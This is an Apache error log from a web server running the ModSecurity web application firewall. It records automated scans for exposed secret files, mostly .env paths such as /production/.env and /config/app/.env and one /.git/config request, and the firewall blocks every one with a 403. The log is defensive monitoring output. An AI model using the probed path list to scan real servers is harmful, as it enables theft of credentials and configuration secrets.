[Mon May 11 16:42:04.402320 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAAAAAMg"]
[Mon May 11 16:42:04.563051 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAQAAAMg"]
[Mon May 11 16:42:04.563550 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAQAAAMg"]
[Mon May 11 16:42:04.563791 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAQAAAMg"]
[Mon May 11 16:42:04.725078 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAgAAAMg"]
[Mon May 11 16:42:04.725627 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAgAAAMg"]
[Mon May 11 16:42:04.725897 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAgAAAMg"]
[Mon May 11 16:42:04.889273 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAwAAAMg"]
[Mon May 11 16:42:04.889750 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAwAAAMg"]
[Mon May 11 16:42:04.889987 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHqvFV4kyjgo4bQBUhbAwAAAMg"]
[Mon May 11 16:42:05.051375 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHqvVV4kyjgo4bQBUhbBAAAAMg"]
[Mon May 11 16:42:05.051849 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHqvVV4kyjgo4bQBUhbBAAAAMg"]
[Mon May 11 16:42:05.052075 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHqvVV4kyjgo4bQBUhbBAAAAMg"]
[Mon May 11 16:42:05.553330 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvAAAAUQ"]
[Mon May 11 16:42:05.554435 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvAAAAUQ"]
[Mon May 11 16:42:05.554774 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvAAAAUQ"]
[Mon May 11 16:42:05.718298 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvQAAAUQ"]
[Mon May 11 16:42:05.718783 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvQAAAUQ"]
[Mon May 11 16:42:05.719028 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvQAAAUQ"]
[Mon May 11 16:42:05.881486 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvgAAAUQ"]
[Mon May 11 16:42:05.881970 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvgAAAUQ"]
[Mon May 11 16:42:05.882205 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHqvYW8yzYoWG_eyCWdvgAAAUQ"]
[Mon May 11 16:42:06.044292 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdvwAAAUQ"]
[Mon May 11 16:42:06.044770 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdvwAAAUQ"]
[Mon May 11 16:42:06.045014 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdvwAAAUQ"]
[Mon May 11 16:42:06.205054 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwAAAAUQ"]
[Mon May 11 16:42:06.205578 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwAAAAUQ"]
[Mon May 11 16:42:06.205824 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwAAAAUQ"]
[Mon May 11 16:42:06.371574 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwQAAAUQ"]
[Mon May 11 16:42:06.372054 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwQAAAUQ"]
[Mon May 11 16:42:06.372286 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwQAAAUQ"]
[Mon May 11 16:42:06.537287 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwgAAAUQ"]
[Mon May 11 16:42:06.537779 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwgAAAUQ"]
[Mon May 11 16:42:06.538027 2026] [security2:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/app/.env"] [unique_id "agHqvoW8yzYoWG_eyCWdwgAAAUQ"]
[Mon May 11 16:42:06.858664 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.020142 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.184017 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.348692 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.514453 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.692776 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:07.863774 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:08.188395 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:08.366371 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:09.711149 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:09.872815 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:10.038233 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:10.207784 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:10.369763 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:42:10.558730 2026] [proxy_fcgi:error] [pid 1424905:tid 1424912] [client 16.148.67.252:56244] AH01071: Got error 'Primary script unknown'
[Mon May 11 16:44:17.103109 2026] [ssl:error] [pid 1416109:tid 1416129] (EAI 2)Name or service not known: [client 52.30.104.250:42648] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 16:44:17.103769 2026] [ssl:error] [pid 1416109:tid 1416129] AH01941: stapling_renew_response: responder error
[Mon May 11 16:44:35.764278 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.147.152.246:53180] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHrUw-Qm4vhlWBPlMjAYAAAAAs"]
[Mon May 11 16:44:35.764861 2026] [security2:error] [pid 1411099:tid 1411111] [client 34.147.152.246:53180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.bender.piregwan-genesis.com"] [uri "/.git/config"] [unique_id "agHrUw-Qm4vhlWBPlMjAYAAAAAs"]
